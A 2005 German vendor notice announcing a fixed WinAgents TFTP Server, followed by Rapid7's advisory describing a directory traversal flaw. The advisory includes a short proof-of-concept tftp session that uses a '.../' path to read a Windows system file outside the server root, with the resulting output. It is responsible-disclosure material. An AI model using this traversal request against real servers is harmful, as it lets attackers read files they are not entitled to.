Vom 18. August 2005 ist neue Version von WinAgents TFTP Server zugänglich. Die erneuerte Version enthält eine Reihe von wichtigen Aktualisierungen, die der Sicherheit Ihres Servers beitragen.
Wir streben danach, dass unser Softway den Sicherheits- und Zuverlässigkeitsanforderungen entspricht.
Trotzdem haben wir am 18.August 2005 die Benachrichtigung der Gesellschaft Rapid7 (http://www.rapid7.com/) erhalten, dass WinAgents TFTP Server Version 3.1 an einer Stelle doch nicht einwandfrei. Die gesicherte Stelle ermöglichte dem Übeltäter den Zugang zu den Files ausserhalb des Wurzelverzeichnisses TFTP.
Nachstehend folgt der Wortlaut dieser Mitteilung.
WinAgents Software Group setzte die neue korrigierte Version WinAgents TFTP Server in Umlauf, die von folgender Adresse abzuladen ist: http://www.winagents.com/downloads/tftpsetup.exe.
Wir empfehlen Ihnen inständig, die erneuerte Version herunterzuladen, denn dies wird dem sicheren Funktionieren Ihres Servers beitragen. Die registrierten Benutzer erhalten die neue Version gratis.
Wir bitten Sie aufrichtig um Verständnis und bedauern um die entstandenen Unannehmlichkeiten.
----------------------------
Rapid7 Security Advisory R7-0020
Directory traversal vulnerability in WinAgents TFTP Server for Windows
Date: August 17, 2005
Revision: 0.1 PRE-RELEAESE
http://www.rapid7.com/advisories/R7-0020.html
NOTE: This advisory contains unpublished, confidential information.
Rapid7 will publish this advisory on Monday, Sept. 19, 2005 or when
updated software is released by WinAgents, whichever comes first.
1. Affected system(s):
KNOWN VULNERABLE:
o WinAgents TFTP Server for Windows
v3.0 and earlier
2. Summary
Rapid7 has found a directory traversal vulnerability in WinAgents
TFTP Server for Windows. This vulnerability allows remote users to
download any files outside of the server's TFTP data directory.
3. Vendor status and information
WinAgents Software Group
http://www.winagents.com/en/products/tftp-server/
Vendor was notified on August 18, 2005.
4. Solution
TBD
5. Detailed analysis
TFTP servers are often used to transfer configuration files and
operating system images to routers. TFTP is also used for devices
that support PXE booting.
Most implementations do trivial filtering on requested filenames
such as "../filename" to prevent easy directory traversal.
However, it is easy to bypass this filtering by manipulating the
filename being requested.
With the WinAgents TFTP server, any file on the system can be
downloaded using a request similar to the following:
$ tftp 192.168.0.1
tftp> get .../WINNT/win.ini
Received 582 bytes in 0.1 seconds
tftp> quit
$ cat win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...
6. Contact Information
Rapid7 Security Advisories
Email: advisory@rapid7.com
Web: http://www.rapid7.com/
Phone: +1 (310) 316-1235
7. Disclaimer and Copyright
Rapid7, LLC. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2005 Rapid7, LLC. Permission is
hereby granted to redistribute this advisory, providing that no
changes are made and that the copyright notices and disclaimers
remain intact.
-----------------------------
